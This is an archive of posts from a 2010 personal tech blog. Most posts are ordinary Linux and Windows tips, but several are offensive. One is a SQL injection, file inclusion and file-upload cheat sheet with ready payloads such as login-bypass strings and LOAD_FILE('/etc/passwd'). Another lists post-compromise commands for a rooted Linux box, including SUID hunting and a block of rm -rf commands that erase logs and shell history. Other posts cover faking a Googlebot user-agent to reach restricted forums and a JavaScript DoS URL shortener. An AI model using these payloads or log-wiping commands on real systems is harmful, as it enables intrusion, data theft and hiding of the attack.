Sunday 26 December 2010

Bypass web filters of Nepali ISPs

Well okay, I am here to rescue you if you are facing the problem of finding the website you want to visit getting blocked by the ISPs. After NTA sent the letters to the ISPs in Nepal to block the sites with some potentially bad contents, ISPs have started doing filtering and blocking of the websites. In this post, I am going to show you how to bypass the web filters being applied by the ISPs. I've tested with the websurfer ISP but still you might find one of these ways working for you.

Method #1:
So I assume you are searching for some stuffs in the torrent and lets say your search query goes to the URL.
For example, I search for sex comedy movie in, the search query would result in a URL like:

Unfortunately websurfer blocks the keywork sex from the URL query so we get the page like below:

Now lets change our query by searching with the caps version of sex i.e. SEX to bypass such filtering. The new URL after entering search keywords would be:

And this time you get the valid webpage with your expected search results. Wasn't that easy bypassing this lame blocking?
Method #2:
I was checking the lists of the websites which were being blocked by Nepali ISPs and my eyes caught and I tried opening it. But it was another site to be blocked.
Check the screenshot below:

This time I am using the internet protocol address (IP Address of the website) to visit the website. In order to find the IP of any website, you can simply do:


This will give you the IP of the website. For, the associated IP was so now on your browser, type the address of the website as and that would bypass and open the website.

Method #3:
Using proxy
While this tends to be slow for me, you can use the freely available proxies to bypass the web filters. I will leave this technique to do on your own as there are hundreds of tutorials on how to use proxies. Anyway, I leave you with the site called which consists of tons of proxies to be used.

Also, you might try installing the TOR software in your system(works pretty well for me).

Method #4:
Another way is to use the alternative DNS servers which will work perfectly if the ISP is blocking the websites based on DNS resolutions. You can use the DNS servers from OpenDNS or Google or you may google for other free DNS servers. Be sure to choose the good DNS server while doing so. The good thing about OpenDNS is that it also provides anti-phishing protection that your ISP might not be providing.

Google's DNS IPs: and
OpenDNS IPs: and

You can then set up the DNS servers either in router or your PC as required.

Method #5 and more:
I will update this post when I test things more and more. I haven't tested with VPNs, google cache, translators, etc. These days, ISPs are also blocking the websites by combining the above discussed methods further aided by the deep packet inspection.

I hope this helps some of you out there. Thanks.


Web Hacking for Beginners and Intermediates

This is the article I posted on the secworm contest and I am now posting this in my blog. Its not that well written due to the lack of time but still will help some of you out there.

Hi all, I am Deadly Ghos7 aka sam207 and this is my article as the entry for the secworm contest #1. First, I would like to apologize for any kind of grammar mistakes in this article as there would be surely lots of grammatical errors in this article.

This article is not an article about teaching the basics of any web hacking techniques. Instead, it is the document of tips and tricks that the beginners and intermediates can make use of in order to attack the web applications on certain scenarios. I assume that you know the basics of the web hacking techniques or you could google for learning the basics. I'll be covering the tricks on different web hacking methods such as SQL injection(MySQL basically), insecure file inclusions, insecure file upload, etc. As already stated, the article won't be about basic but rather would present you few useful tricks that might be useful in the course of web-app pentesting.

SQL Injection:
Comments: - - , /* , #
MySQL version: SELECT @@version

Current SQL User: SELECT user()
SELECT system_user()

Current Database: SELECT database()

MySQL Data directory(location of MySQL data files): SELECT @@datadir

List all MySQL users: SELECT host, user, password FROM mysql.user

Bypass Quotes: SELECT pass FROM users WHERE user=0x2773616d32303727 --hex
SELECT pass FROM users WHERE user=char

Load local file: SELECT LOAD_FILE('/etc/passwd') --We can use quote bypassing here.

Create File with SQLi: SELECT * FROM table INTO dumpfile '/tmp/dump'
SELECT password FROM user INTO OUTFILE '/home/samar/www/dump.txt'
quote bypassing seems not working here. The path can't be encoded using the quote or char so we can't bypass the quote in this case.

Using limit: union all select null,table_name,null from information_schema.tables LIMIT 20,1
(useful when only one column is seen while doing SQLi)

unhex(hex()): union all select 1,concat(unhex(hex(username,0x3a,password))) from tblusers--

Bypassing filters:
uNiOn aLl SeLeCT 1,2 FrOm tbluser
/*!union*/ all select 1,2 from tbluser
union(select(null),table_name(from)(information_schema.tables)) --Bypassing the whitespace filter

XSS with SQLi (SIXSS): union all select 1,<script>alert(123)</script>

Login bypass:
'=' in both username and password field
' or 1='1'--
' or 1='1'/*
' or 1='1'#
' or 1='1';
In the username field and random password, it would bypass the vulnerable authentication login.

' /*or*/ 1='1 –Bypasses or filter

File Inclusion:
-> A sample vulnerable piece of code would be something like below: test.php

including file in the same directory

path traversal to include files in other directories

Nullbyte injection

Directory listing with nullbyte injection only for FreeBSD (afaik) and magic quotes off

PHP stream/wrappers inclusion

Path Truncation inclusion
test.php?page=../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
With more details on this,
Apache Log injection
You'll have to find the location of the log in order to include it. Also you should try including everything you can such as the session files, uploaded files, etc. For the apache log injection, you'll have to telnet and send the GET request for arbitrary PHP code like Get / Few apache log locations to try are as below:

Set your useragent to some php code and it will get executed if you are able to include the /proc/self/environ file.

Check existence of folder:
Here the trick is basically using the path traversal method.

File upload:
Nullbyte injection: If only valid extensions(such as jpg, gif) are allowed, we can rename our shell to shell.php.jpg which will bypass the file upload security check.

PHP code within image: Sometimes the uploads are not checked for the file extension but for dimensions of images. This again can be bypassed by injecting PHP codes in the valid images and renaming them to .php file. The tool named edjpgcom can be used in order to inject the PHP code as JPEG comments in the images.

Header bypass: Again sometimes the developer just relies on the header information that contains the type of the file like “image/jpeg” for jpeg image. But since this is passed from client side, it can be modified using the tools such as tamper data or live http headers.

Also, the file upload feature can be exploited in union with the file inclusion vulnerability. If you have a site vulnerable to the file inclusion but not vulnerable to the insecure file upload, you can upload valid image as said in second method here and then you can include that file with the file inclusion vulnerable PHP script.

As said earlier, this article is not about giving you every steps of how to exploit the web vulnerabilities.


Friday 24 December 2010

Browsing the restricted forums without registering

Well it has worked for me and I am posting how you can browse the restricted forums by misusing the SEO things(I guess). A website traffic hugely depends upon the google search and hence most of the websites allow the google bot to crawl and index their pages for appearing in the search result. Now the google bot useragent is allowed to crawl any restricted forum and hence they can index those pages.

The requirement is the useragent switcher add-on for firefox which can be downloaded from HERE. Install this addon and restart it.

Now in the firefox menu, under tools, you will see a new option Default User Agent from where you can choose different user agents and add new user agents. Among the available user agents, you will find the Google Bot 2.1 useragent under the Search Robots option. Choose the Google Bot 2.1 as your default user agent and now start visiting the forums that were asking you to register. It will also work on other types of websites which usually require login. I hope this helps you. Thanks :)


Few useful commands to use on rooted Linux box

So I was just reading my backups and came across this text file and with the hope that this might be helpful, I am posting the list of few useful linux commands that you might be using after rooting a Linux box. Also, I am not responsible for anything and neither is the original author. Use the commands properly with the proper knowledge.

cat ./../mainfile.php - Config file.
ls -la - Lists directory's.
ifconfig {eth0 etc} - Ipconfig equiv.
ps aux - Show running proccess's.
gcc in_file -o out_file - Compile c file.
cat /etc/passwd - List's accounts.
sudo - Superuser Do run a command as root provided you have perms
in /etc/sudoers.
id - Tells you what user your logged in as.
which wget curl w3m lynx - Check's to see what downloaders are
uname -r - Shows all release info (or) cat /etc/release.
uname -a - Shows all kernal info (or) cat /etc/issue
last -30 - Last logged 30 ip's can change to desired number.
useradd - Create new user account.
usermod - Modify user account.
w - See who is currently logged on.
locate password.txt - Locates password.txt in current dur can use *.
rm -rf / - Please be carefull with this command, i cannot stress this
arp -a - Lists other machines are on the same subnet.
lsattr -va - ls file attributes on linux second extended file system
find / -type f -perm -04000 -ls - Finds suid files.
find . -type f -perm -04000 -ls - Finds suid files in current dir.
find / -type f -perm -02000 -ls - Finds all sgid files.
find / -perm -2 -ls - Finds all writable files and folders.
find . -perm -2 -ls - Finds all writable files and folders in current dir.
find / -type f -name .bash_history - Finds bash history.
netstat -an | grep -i listen - shows open ports.
cut -d: -f1,2,3 /etc/passwd | grep :: - From memory creates a user
with no pass.
find /etc/ -type f -perm -o+w 2> /dev/null - Write in /etc/passwd?.
cat /proc/version /proc/cpuinfo - Cpu info.
locate gcc- Finds gcc if installed.
set - Display system variables.
echo $path- Echo current path.
lsmod- Dumps kernal modules.
mount/df- Check mounted file system.
rpm -qa- Check patch level for RedHat 7.0.
dmesg- Check hardware ino.
cat /etc/syslog.conf - Log file.
uptime - Uptime check.
cat /proc/meminfo - Memory check.
find / -type f -perm -4 -print 2> /dev/null- Find readble files.
find / -type f -perm -2 -print 2> /dev/null - Find writable files.
chmod ### $folder - Chmod folder.
ls -l -b - Verbosly list directory's


rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c

find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;


Thursday 23 December 2010 the Evil URL Shortener

Many of you might have heard about LOIC which has been used by kids to DDoS attack the sites. Now, the creative hacker Ben Schmidt (supernothing) of has implemented the JS LOIC in order to use it for the DoS attacks.

Whenever the users visit the shortened URLs from, the website being visited will be constantly sent the HTTP requests everytime, thus creating the DoS condition. So this can be utilized to create the botnet for the DDoS attack. Why not read the post from Ben Schmidt himself? The Evil URL Shortener website


Sunday 12 December 2010

Google Input Method: Type anywhere in your language

Google Transliteration IME is an input method editor which allows users to enter text in one of the supported languages using a roman keyboard. Users can type a word the way it sounds using Latin characters and Google Transliteration IME will convert the word to its native script. Note that this is not the same as translation -- it is the sound of the words that is converted from one alphabet to the other, not their meaning. Converted content will always be in Unicode.

Google Transliteration IME is currently available for 22 different languages - Amharic, Arabic, Bengali, Farsi (Persian), Greek, Gujarati, Hebrew, Hindi, Kannada, Malayalam, Marathi, Nepali, Oriya, Punjabi, Russian, Sanskrit, Serbian, Sinhalese, Tamil, Telugu, Tigrinya and Urdu.

You can download Google IME from the link below:

Google IME


Saturday 11 December 2010

Safe URL shortening with

Recently, there have been lots of misuse of the popular URL shortening services in order to infect the users with the malwares. I've been hating these URL shortening services but now has arrived as a safe alternative for these URL shortening services. service checks the link for the malicious content using the Bitdefender antivirus. When using for URL shortening you get the added benefit of antivirus and antiphishing scans, which allow you and your friends to safely share content over the Internet. A check on your URL means that all those who are going to use it are safe from malware and from personal data theft attempts.


Avoiding the Man In The Middle through ARP Spoofing/Poisoning

ArpON (Arp handler inspectiON) is a portable handler daemon that make ARP secure in order to avoid the Man In The Middle through ARP Spoofing/Poisoning. It detects and blocks also Man In The Middle through ARP Spoofing/Poisoning for DHCP Spoofing, DNS Spoofing, WEB Spoofing, Session Hijacking and SSL/TLS Hijacking & co attacks.

This is possible using two kinds of anti ARP Poisoning tecniques: the first is based on SARPI or "Static Arp Inspection" the second on DARPI or "Dynamic Arp Inspection" approach. SARPI and DARPI protects both unidirectional, bidirectional and distributed attacks.

Into "Unidirectional protection" is required that ArpON is installed and running on one node of the connection attacked. Into "Bidirectional protection" is required that ArpON is installed and running on two nodes of the connection attacked. Into "Distributed protection" is required that ArpON is installed and running on all nodes of the connections attacked. All other nodes whitout ArpON will not be protected from attack.

ArpON is therefore a host-based solution that doesn't modify ARP's standard base protocol, but rather sets precise policies by using SARPI for static networks and DARPI for dynamic networks (DHCP) thus making today's standardized protocol working and secure from any foreign intrusion.

Third party solutions exist, but all of them have some weaknesses, weaknesses which aren't present in ArpON.
Some examples:

1) Arpwatch: detects foreign intrusions but doesn't block them;
2) S-Arp (Secure ARP) slows down the protocol by injecting additional headers, encrypting communication and thus requiring more computational power;
3) DAI (Dynamic ARP inspection) from Cisco, ProCurve, Extreme Networks, Dlink and Allied Telesis slows down the protocol by making multiple DHCP server interrogations (DHCP Snooping) thus requiring more computational power;
4) IEEE 802.1AE, slows down the protocol by making massive use of encryption thus requiring more computational power.

Keep in mind other common tools fighting ARP poisoning usually limit their activity only to point out the problem instead of blocking it, ArpON does it using SARPI and DARPI policies. Finally you can use ArpON to pentest some switched/hubbed LAN with/without DHCP protocol, in fact you can disable the daemon in order to use the tools to poison the ARP cache.

- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning attacks in statically configured networks;
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning attacks in dinamically configured (DHCP) networks;
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning for DHCP Spoofing attack;
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning for DNS Spoofing attack;
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning for WEB Spoofing attack;
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning for Session Hijacking attack;
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning for SSL/TLS Hijacking attack;
- It detects and blocks unidirectional, bidirectional and distributed attacks;
- Doesn't affect the communication efficiency of Arp protocol;
- Multithreading on all OS supported (Pthread lib);
- It manages the network interface into unplug, boot, hibernation and suspension OS features;
- It works in userspace for OS portability reasons;
- Easily configurable via command line switches, provided that you have root permissions;
- It replaces Arpwatch, DAI (Dynamic ARP Inspection), S-ARP (Secure-ARP), IEEE 802.1AE & co;
- Tested against Ettercap, Cain & Abel, dsniff and other tools.

Download ArpON


Wi-fEye - Automated Network penetration testing tool

Wi-fEye is designed to help with network penetration testing, Wi-fEye will allow you to perform a number of powerful attacks Automatically, all you have to do is to lunch Wi-fEye, choose which attack to perform, select your target and let Wi-fEye do the magic !!.

Wi-fEye is divided to four main menus:
1. Cracking menu: This menu will allow you to:

* Enable monitor mode
* View avalale Wireless Networks
* Launch Airodump-ng on a specific AP
* WEP cracking: this will allow you to perform the following attacks automatically:

o Interactive packet replay.
o Fake Authentication Attack.
o Korek Chopchop Attack.
o Fragmentation Attack.
o Hirte Attack (cfrag attack).
o Wesside-ng.
* WPA Cracking: This contains the following attacks:
o Wordlist Attack
o Rouge AP Attack.

2. Mapping: this menu will allow you to do the following:

* Scan the network and view the connected hosts.
* Use Nmap Automatically.

3. MITM: this menu will allow you to do the following Automatically:

* Enable IP forwarding.
* ARP Spoof.
* Launch ettercap (Text mode).
* Sniff SSL/HTTPS traffic.
* Sniff URLs and send them to browser.
* Sniff messengers from instant messengers.
* Sniff images.
* DNS Spoof.
* HTTP Session Hijacking (using Hamster).

4. Others: this menu will allow you to o the following automatically:

* Change MAC Address.
* Hijack software updates (using Evilgrade).

Download Wi-fEye tool
Documentation for Wi-fEye tool


Friday 10 December 2010

Rename file extension of multiple files at once

Sometimes, you might need to rename the file extension of multiple files and this can be simply accomplished from command line without the use of any tools.

In the command prompt, move to the proper directory containing the files whose extension is to be renamed. Then type as following in the command prompt.
ren *.jpg *.exe

The above command will rename all the jpg files in that folder to exe. Similar command rename exists in the linux to achieve the same effect. Hope this comes to be handy for you.


Fix Alt+PrintScreen Shortcut for Current Window Screenshot not working

Today, I was trying to get the screenshot of the current window and found that the Alt+PrintScreen was not working. The solution for this problem is as below:

To solve this problem, you need to do as following:

$ sudo gedit /etc/sysctl.conf

Just add the following line in this file.

kernel.sysrq = 0

This should solve the problem. Hope this helps. :)


RIPS - PHP Static Source Code Analyzer

RIPS is a static source code analyser for vulnerabilities in PHP webapplications. It was released during the Month of PHP Security (

In this submission a tool named RIPS is introduced which automates the process of identifying potential security flaws in PHP source code by using static source code analysis. RIPS is open source and freely available at The result of the analysis can easily be reviewed by the penetration tester in its context without reviewing the whole source code again. Given the limitations of static source code analysis, a vulnerability needs to be confirmed by the code reviewer.


Cracking password protected ZIP archives with fcrackzip under linux

If you are looking for password protected zip archive cracker for linux, fcrackzip is the tool that can be used for the purpose.

fcrackzip is a fast password cracker partly written in assembler. It is able to crack password protected zip files with brute force or dictionary based attacks, optionally testing with unzip its results. It can also crack cpmask'ed images.

To install it, type the following in terminal

$ sudo apt-get install fcrackzip


Saturday 4 December 2010

Antivirus Softwares for Linux

The myth of Linux being insecure is not true but it is said so due to the fact that it is not that widely used and not much used in the enterprises and homes but still they are not full proof so some antivirus protection for you Linux system might be obtained with any of the following softwares.

1) ClamAV: Clam AntiVirus is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways. It provides a number of utilities including a flexible and scalable multi-threaded daemon, a command line scanner and advanced tool for automatic database updates. The core of the package is an anti-virus engine available in a form of shared library.
ClamAV Home

2) Bitdefender AV Scanner: BitDefender Antivirus Scanner for Unices is a versatile on-demand scanner for Linux and FreeBSD systems. The stand-alone scanner protects both UNIX-based and Windows-based disk partitions by scanning for viruses and spyware. Easy to use graphical user interface complements a powerful command line interface that fully supports operating system’s scripting tools.
Bitdefender AV Scanner for Unices

3) AVG: Basic antivirus protection for Linux/FreeBSD available to download for free. Free virus protection for your PC. For private and non-commercial use only.

4) avast! Linux Home Edition: avast! Linux Home Edition represents an antivirus solution for the increasingly popular Linux platform. The Home Edition is offered free of charge but only for home, non-commercial use.
Avast! Linux Home Edition

5) F-Prot AV: F-PROT Antivirus for Linux was especially developed to effectively eradicate viruses threatening workstations running Linux. It provides full protection against macro viruses and other forms of malicious software - including Trojans.
F-Prot AV

Any other additions, feel free to comment here.


Wednesday 1 December 2010

Online typing speed test

I remembered this site which I used to try in my old days when computers were new to me. The speed testing feature from this site seems to be reliable and today I was just seeing how fast my fingers go in this freezing cold weather.

67 words

Lol I lost my speed due to freezing cold weather out here in Nepal :P


Probably the best free security list in the world

Just found this webpage when I was browsing; this page enlists many security tools under different categories which might be useful for you. So I just thought to share the page here.

Probably the best free security list in the world page

the list consists of the security tools under following categories:

* Realtime protection
* Scanners
* Tools for virus removal
* Online-scanners
* Firewalls
* System hardening-HIPS
* System hardening
* Sandboxing/virtualization
* Vulnerability scanning and updates
* Browser security
* IP-blocking/hardening
* What's new
* Privacy
* System monitoring
* Network traffic monitoring
* System cleaning
* Data rescue
* Encrypting
* Backup
* System rescue
* Miscellaneous
* Tests and malware analysis tools
* Vista/Windows 7 specific security
* Prisoners on remand
* Doing time in jail


Speeding up opening of Acrobat Reader

Whenever you launch acrobat reader, it takes some extra times while loading the plugins and we rarely use those plugins(In fact, I rarely use them) so we can speed up the opening of acrobat reader.

The trick in speeding up the process of opening acrobat reader is by removing the plugins from plugins folder and putting them in the folder called optional. First, go to the acrobat reader installation directory which will be probably located somewhere at

C:\program files\adobe\

There, you will see the folder called plugins. What you have to do is cut and paste all the items from plugins folder to optional folder. Make sure that you are not locking any of those files by opening the acrobat reader while doing cut/paste. Hope this helps you. :)


Tuesday 30 November 2010

Installing Evan's Debugger in Ubuntu

I needed a debugger(other than GDB) in my ubuntu and searched the net and came across the Evans Debugger. Though installation does not require much work, some of you might want some sort of article on installing it so here it is.

First, we will prepare our system by downloading the required dependencies(QT4 dev and boost dev libraries) and then we compile the debugger source archive we have previously downloaded from HERE.
Follow the steps as below to have the debugger installed on your system.

$ sudo apt-get install libqt4-dev libboost1.42-all-dev
$ tar zxvf debugger-0.9.16.tgz
$ cd debugger-0.9.16
$ qmake -makefile DEFAULT_PLUGIN_PATH="/usr/lib/edb/"
$ make
$ sudo make INSTALL_ROOT=/usr install

Now you can make the launcher or shortcut in the menu by giving the path for command as /usr/bin/edb. Hope this helps.


Tuesday 23 November 2010

Some useful linux commands

This page lists some of the useful linux commands you might need to be using frequently. This is however not the complete list of the commands, rather I'd try to post more and more useful linux commands here.

gksudo command/program - run the visual sudo and start the specified command/program with elevated privilege.

sudo command - run the command with elevated privilege.

ps -A | grep -i your_program_name - ps gives the snapshot of the current running processes and this can be quite useful to view the running program's PID to use with kill command.

kill pid - this will kill the target program by using PID. you might need to use sudo version sometimes if the running program was not run by the current user.

ifconfig - display the network interface information. iwconfig is the similar tool for the wireless device.

ufw enable/disable - enable or disable the firewall.

uname -a - get every information about your linux kernel.

sudo dpkg --configure -a - configure and repair the broken package.

I'll be updating this list with any commands I happen to remember.


Making movie from your pictures in ubuntu using PhotoFilmStrip

If you are in the need of creating the movie from your pictures in ubuntu, PhotoFilmStrip might be the perfect tool to use.

PhotoFilmStrip creates movies out of your pictures in just 3 steps. First select your photos, customize the motion path and render the video. There are several output possibilities for VCD, SVCD, DVD up to FULL-HD. This tool creates animated slideshows.

Get the DEB package from PhotoFilmStrip SourceForge

Thanks. :)


Monday 22 November 2010

Some hacking and security distribution to try

So you want to learn the art of hacking or you want to be in the professional pen-testing? or whatever related to information security. You can try some of the security and hacking distributions which I've listed as below:

Backtrack: It is the highest rated and acclaimed Linux security distribution to date. BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless if you’re making BackTrack your primary operating system, booting from a LiveDVD, or using your favorite thumbdrive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester. So don't miss this one.

NodeZero: It is Ubuntu based linux designed as a complete system which can also be used for penetration testing. NodeZero uses Ubuntu repositories so your system will be always up to date. The system setup is basic and it's primarly designed for disk installation and customization as you want. With NodeZero comes around 300 tools for penetration testing and set of basic services which are needed in penetration testing. Also they are preparing a repository of pentest tools so your system will be up to date at all time.

DEFT Linux: DEFT Linux v6 is based on the new Kernel 2.6.35 (Linux side) and the DEFT Extra 2.1 (Computer Forensic GUI) with the best freeware Windows Computer Forensic tools. DEFT it’s a new concept of Computer Forensic live system that use LXDE as desktop environment and thunar file manager and mount manager as tool for device management. It is a very easy to use system that includes an excellent hardware detection and the best free and open source applications dedicated to incident response and computer forensics.

Katana: Katana is a portable multi-boot security suite which brings together many of today's best security distributions and portable applications to run off a single Flash Drive. It includes distributions which focus on Pen-Testing, Auditing, Forensics, System Recovery, Network Analysis, and Malware Removal. Katana also comes with over 100 portable Windows applications; such as Wireshark, Metasploit, NMAP, Cain & Abel, and many more.
Site: Katana Home

I'll update this post when I get to know more distros.


Sunday 21 November 2010

Enabling telnet in windows 7

AYesterday when I was on my saturday class in kathmandu, I needed to use telnet in order to find the ssh version of some server as the part of recon challenge for my friend. But I found that the windows 7 by default has no telnet client. After returning to KU, I played around with my friends laptop to find the way to enable telnet client.

Just go to the control panel and choose the programs and features option.
There, you'll find the option Turn Windows features on or off.
Check the telnet client and hit Ok.
Now you can use the telnet client in your windows 7. Have fun.


Nude.js - Nudity detection with javascript and HTMLCanvas

Today I came across an interesting page on nudity detection with javascript and HTMLCanvas. nude.js is an open source script that would be pretty useful for client side nudity detection for child filter and other social media platforms.

nude.js is a JavaScript implementation of a nudity scanner based on approaches from research papers. HTMLCanvas makes it possible to analyse image data and afterwards decide whether it should be displayed or not. The detection algorithm runs at the client, therefore it's possible (with user interaction) to display the image even if it's identified as nude (false positive).

you can download the nude.js from HERE.

For the demo, visit this page.


Friday 19 November 2010

Installing Damn Vulnerable Linux under virtualbox

I had some problems while installing Damn Vulnerable Linux under virtualbox so I thought I would share the process I did to instal the DVL with virtualbox. I won't be going into the details of what the DVL is, anyway.

First, with the .iso file or the DVD drive, boot with the live DVD of Damn Vulnerable Linux(DVL) and login as root. Now we will prepare partition using fdisk utility. Follow the steps as i describe below:

-> Type startx to start the GUI for DVL.

-> Under konsole, type fdisk /dev/hda. Replace hda with the appropriate disk like /dev/sda for you.

-> Now you'll get the following prompt:
command (m for help):
type the letter n and press enter.
then type the letter p to create a primary partition and type 1 again.
Then type a and then type 1 to make the partition bootable. Finally type w to write the partition table.

-> Now we will format the newly created partition by entering the following command:
mkfs.ext3 /dev/hda1 Replace with the proper device like hda2 or sda1...You might need to restart the VM sometimes before or maybe after doing this.

-> now we create the folders to mount our hdd and DVL iso.

mkdir /mnt/dvl/
mkdir /mnt/iso/

-> Next we mount the hard drive and iso as below:

mount /dev/hda1 /mnt/dvl/
mount /dev/hdc /mnt/iso/

-> The prepartion phase is over. Now lets start the backtrack installer from application menu(Be ReSlaxed > System > Backtrack Installer)

-> Now configure the installer as shown below:
Source(Backtrack CD): /mnt/iso/
Install BackTrack to: /mnt/dvl/
Write MBR to: /dev/hda
Installation Method: Real

Next click on install and wait for the installation and copying of the Damn Vulnerable Linux.

-> Finally enter the following commands in terminal:

chroot /mnt/dvl/ /bin/bash
lilo -v

Now remove the DVD/.iso file and you should have your DVL installed in your virtual machine.


Variations for exploiting the File Inclusion vulnerability

This post lists some of the ways that I've learnt to exploit the file inclusion vulnerability. I'm quite sure that there are much more variations and modifications to exploit file inclusion so if you have any, feel free to comment here.

Before going on this post, you might want to read my previous articles posted here before:
LFI tutorial
RFI tutorial
-> A sample vulnerable piece of code would be something like below: test.php

-> including file in the same directory

-> path traversal to include files in other directories

-> Nullbyte injection

-> Directory listing with nullbyte injection only for FreeBSD (afaik) and magic quotes off

-> PHP stream/wrappers inclusion

-> Path Truncation inclusion
test.php?page=../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …

I'll update it more and more when I get to know other variations on exploiting the file inclusion vulnerabilities.


Updating|Upgrading ubuntu via terminal

While you might be mostly using the GUI update manager (System-> Administration-> Update Manager), you might also be interested to know how to update your ubuntu from the terminal.

Open your terminal and enter the following two lines of code and you'll be easily updating ubuntu from your terminal.

sudo apt-get update

sudo apt-get upgrade

Isn't that as easy as using the GUI update manager? Hope it helps.


Thursday 18 November 2010

Converting dynamic disk to basic with diskpart

For some reason I had to convert my virtual hard disk from dynamic to basic type and Disk management GUI didn't allow me to do so. So here I am going to show you how to accomplish this task with command line option with the diskpart.exe

First delete all the volumes in the disk from the disk management GUI tool(type diskmgmt.msc in run).

You'll have to follow the following steps in order to convert the disk type:
- type diskpart in the command prompt
- to view the available disk, type list disk
- now select your target disk, type select disk n where n = ID of the disk
- finally type convert basic to have your disk converted to the basic type.

Hope it will be useful sometimes.


Tuesday 9 November 2010

Speeding up softwares installation in ubuntu with apt-fast

By default, we use apt-get to install the applications in the linux but it is not always that good in terms of the speed of download. So has come as an open source alternative for this purpose.

The apt-fast script from is a little shellscript that increases the speed of apt-get by many times. You need to have the axel download accelerator installed, which is a simple, short process, but everything else is extremely straight forward.

So, you'll have to first install the axel download accelerator either from the ubuntu software center or by doing as below:

sudo apt-get install axel

After installing axel, just download the apt-fast shellscript from HERE. After downloading the shellscript, just do the following and you are done.

sudo cp $HOME/Downloads/ /usr/bin/apt-fast
sudo chmod +x /usr/bin/apt-fast

Now you can use apt-fast from the terminal to install and update the packages installed under your ubuntu installation. Hope this helps to improve your speed. :)


Changing the default GRUB2 boot order

In order to change the way GRUB works, you need to edit the GRUB configuration file which is located at /etc/default/grub. Here, I'll post the way to change the default boot order of the GRUB2.

In order to edit the GRUB configuration file, enter the following command in the terminal:

sudo gedit /etc/default/grub

Its content will look like below:
# If you change this file, run 'update-grub' afterwards to update
# /boot/grub/grub.cfg.

GRUB_DISTRIBUTOR=`lsb_release -i -s 2> /dev/null || echo Debian`

# Uncomment to disable graphical terminal (grub-pc only)

# The resolution used on graphical terminal
# note that you can use only modes which your graphic card supports via VBE
# you can see them in real GRUB with the command `vbeinfo'

# Uncomment if you don't want GRUB to pass "root=UUID=xxx" parameter to Linux

# Uncomment to disable generation of recovery mode menu entries

# Uncomment to get a beep at grub start
#GRUB_INIT_TUNE="480 440 1"

You need to change the value of GRUB_DEFAULT=0 parameter in order to change the default boot order of the grub.

0 is the first and default entry so lets say another OS like Windows 7 is in the 5th position of the boot order, you would change the value of GRUB_DEFAULT=0 parameter to 4.

Now with the change in the GRUB, you need to update grub by issuing the following command in terminal:
sudo update-grub

Hope this helps you. :)


Monday 8 November 2010

Password protecting the mounting of NTFS drives in Ubuntu

You might want to password protect the mounting process of the NTFS drives in your ubuntu OS for the purpose of privacy...

Enabling password protection is not hard stuff enough. Just follow the following instructions for this:

- Open the terminal and type:

sudo gedit /var/lib/polkit-1/localauthority/10-vendor.d/com.ubuntu.desktop.pkla

- Just comment by adding # at the beginning of each line in the first four lines or all the lines above the line [Change CPU Frequency scaling] i.e. upto the line ResultActive=yes

- Now save the file and whenever you try to mount the NTFS drives under ubuntu, it will prompt you for the pasword.


Accessing shared folders of host system from Backtrack4(virtual)

As the title of the post says, this post will help you to access the shared folders. The example is based on the Backtrack 4 installed as virtual OS with VirtualBox OSE under ubuntu 10.10 but there should not be problem in other systems too as long as the virtual OS is linux-based.

From the VirtualBox menu, Device->Shared Folders, you can add, edit and remove the shared folders that are shared by the host OS with the virtual OS.

Now onto the main problem, just enter the following command in order to successfully access the shared folders from within the BT4.

mount -t vboxsf /mnt

For example, if I share the folder $HOME/Desktop, I would do following in the BT4 konsole.

mount -t vboxsf Desktop /mnt

Note that if the windows system is the host OS, then I think you should include your shared folders as the Transient folder (anyone to make sure of this?) instead of the Machine Folders.
That's all. I hope this helps you.


Installing VirtualBox Addition in Backtrack 4 Final

I run ubuntu linux and Win XP and BT4 in the Virtual environment using VirtualBox OSE. There was no problem installing VirtualBox Guest Addition in XP, however, I had problem installing it in Backtrack 4 so I tried few things and finally was successful to solve it. And I thought to share with you as it might help you as well.

Just enter the following commands one after another in the terminal(konsole in BT 4) and you're done.

- mkdir /vboxguest

- mount /dev/hdc /vboxguest

- cd /vboxguest

- ./

- reboot

After the reboot, you'll see the VirtualBox Guest Addition working properly for your BT4 installation. Hope this helps.


Solving Wireless Disabled Problem in Ubuntu 10.10

I was experiencing problem enabling the wireless in HP DV6 and tried few solutions for it. Finally, I came with this small solution which might be useful for you too.

Follow the steps as follows:
- Turn on the wireless switch(it still looks like being turned off).

- Now you need to edit the NetworkManager.state file located at /var/lib/NetworkManager/.
So enter the following command in the terminal:

sudo gedit /var/lib/NetworkManager/NetworkManager.state

This will open the NetworkManager.state file in the text editor which will most probably look like below:


Now, change the line WirelessEnabled=false line to true and save and close the text editor.

Now, we'll have to use rfkill command to view and unblock the wireless device. Note that the rfkill command is the tool to enable and disable wireless devices such as WiFi and bluetooth.

In the terminal, run the command rfkill list which will list the wireless devices, their identifier(numeric value like 0, 1) and the status of blocking at software and hardware level.

Now, pick up the identifier of the wifi(in my case, its 0 for hp-wifi) and just issue the command rfkill unblock 0 and then reboot the system.

This should solve the problem for you. If not, drop your comment here and I'll try to find the best solution for you.


Thursday 14 October 2010

Two New Online Tools From Tech Gaun

I was getting bored with no task to do at home and thought of adding some features to the blog and came up with two new features.

The first feature is unicode nepali converter and this can be used to convert romanized nepali typed in english to unicode nepali.
Unicode Nepali Converter
